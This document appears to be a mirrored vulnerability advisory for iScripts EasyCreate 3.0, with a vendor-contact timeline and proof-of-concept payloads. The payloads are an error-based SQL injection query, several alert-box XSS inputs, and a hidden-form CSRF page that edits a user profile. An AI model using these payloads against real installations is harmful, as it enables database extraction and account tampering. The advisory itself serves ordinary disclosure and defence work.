Professional Documents
Culture Documents
0 Multiple Vulnerabilities
- Site: http://www.iscripts.com
[Advisory Timeline]
[17.11.2015] First contact to vendor.
[08.12.2015] Follow up with vendor. No response received.
[08.12.2015] Ticket Created using online portal (id #010248399110346).
[08.12.2015] Ticket closed by vendor without requesting vulnerability details.
[28.12.2015] Vendor responds asking more details.
[29.12.2015] Sent details to the vendor.
[05.01.2016] Follow up with vendor. No response received.
[14.01.2016] Follow up with vendor. No response received.
[28.01.2016] Public Security advisory released.
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Stored)
- Cross Site Scripting (Reflected)
- Cross Site Request Forgery
[Impact]
- High
[Affected Version]
- EasyCreate 3.0
[Advisory]
- ZSL-2016-5298
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5298.php
[Proof-of-Concept]
1. SQL Injection
Parameter:
siteid (GET)
Payload:
action=editsite&siteid=6 AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x71716b6a
71,(SELECT (ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++
2. Multiple Stored Cross Site Scripting
Parameter:
siteName (POST)
Payload:
Content-Disposition: form-data; name="siteName"
<script>alert(1)</script>
Parameter:
selectedimage (POST)
Payload:
selectedimage=<script>alert(1)</script>
Parameter:
filename (POST)
Payload:
filename=<script>alert(1)</script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++
3. Multiple Reflected Cross Site Scripting
Parameter
catid (GET)
Parameters
selectedimage, description, keywords, robotans, refreshans, authorans, copyright
ans, revisitans, cmbSearchType (POST)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++
4. Multiple Cross Site Request Forgery (CSRF)
Sample Payload for editing profile:
<html>
<body>
<form action="http://localhost/easycreate/demo/editprofile.php?act=post" met
hod="POST">
<input type="hidden" name="vuser_login" value="user" />
<input type="hidden" name="vuser_name" value="Demo User" />
<input type="hidden" name="vuser_lastname" value="PWNED" />
<input type="hidden" name="vuser_email" value="demo@demo.com"
/>
<input type="hidden" name="vuser_address1" value="a" />
<input type="hidden" name="vcity" value="" />
<input type="hidden" name="vstate" value="" />
<input type="hidden" name="vcountry" value="United States" />
<input type="hidden" name="vzip" value="" />
<input type="hidden" name="vuser_phone" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"